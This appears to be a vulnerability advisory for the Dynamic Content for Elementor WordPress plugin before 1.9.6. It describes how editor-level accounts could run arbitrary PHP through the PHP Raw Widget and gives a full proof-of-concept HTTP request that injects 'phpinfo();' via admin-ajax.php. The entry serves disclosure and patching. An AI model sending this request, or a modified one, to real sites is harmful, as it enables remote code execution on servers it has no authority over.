WordPress Plugin Vulnerabilities
Dynamic Content for Elementor < 1.9.6 - Authenticated RCE
Description
The PHP Raw Widget (https://www.dynamic.ooo/widget/php-raw/) of the Dynamic Content for Elementor plugin before 1.9.6 did not properly check for user permissions, allowing accounts with a role as low as editor to perform RCE attacks.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://example.com/wp-admin/post.php?post=1&action=elementor Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1657 Origin: https://example.com DNT: 1 Connection: close Cookie: [Editor account cookies] actions=%7B%22save_builder%22%3A%7B%22action%22%3A%22save_builder%22%2C%22data%22%3A%7B%22status%22%3A%22publish%22%2C%22elements%22%3A%5B%7B%22id%22%3A%227d8463f3%22%2C%22elType%22%3A%22section%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%2267a91131%22%2C%22elType%22%3A%22column%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22_column_size%22%3A100%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%22434ded6e%22%2C%22elType%22%3A%22widget%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22editor%22%3A%22%3Cp%3E%3C!--+wp%3Aparagraph+--%3E%3C%2Fp%3E%5Cn%3Cp%3EWelcome+to+WordPress.+This+is+your+first+post.+Edit+or+delete+it%2C+then+start+writing!%3C%2Fp%3E%5Cn%3Cp%3E%3C!--+%2Fwp%3Aparagraph+--%3E%3C%2Fp%3E%22%7D%2C%22elements%22%3A%5B%5D%2C%22widgetType%22%3A%22text-editor%22%7D%5D%7D%5D%7D%2C%7B%22id%22%3A%22c011af3%22%2C%22elType%22%3A%22section%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%22d8404b7%22%2C%22elType%22%3A%22column%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22_column_size%22%3A100%2C%22_inline_size%22%3Anull%7D%2C%22elements%22%3A%5B%7B%22id%22%3A%228b4910d%22%2C%22elType%22%3A%22widget%22%2C%22isInner%22%3Afalse%2C%22settings%22%3A%7B%22custom_php%22%3A%22phpinfo()%3B%22%7D%2C%22elements%22%3A%5B%5D%2C%22widgetType%22%3A%22dce-rawphp%22%7D%5D%7D%5D%7D%5D%2C%22settings%22%3A%7B%22post_title%22%3A%22Hello+world!%22%2C%22scroll_viewport%22%3A%22%23outer-wrap%22%2C%22scroll_contentScroll%22%3A%22%23wrap%22%2C%22post_status%22%3A%22publish%22%7D%7D%7D%7D&_nonce=496eff7787&editor_post_id=1&initial_document_id=1&action=elementor_ajax
Affects Plugins
Fixed in version 1.9.6
References
Classification
Miscellaneous
Timeline
Publicly Published
2020-10-08 (about 2 years ago)
Added
2020-10-08 (about 2 years ago)
Last Updated
2020-10-09 (about 2 years ago)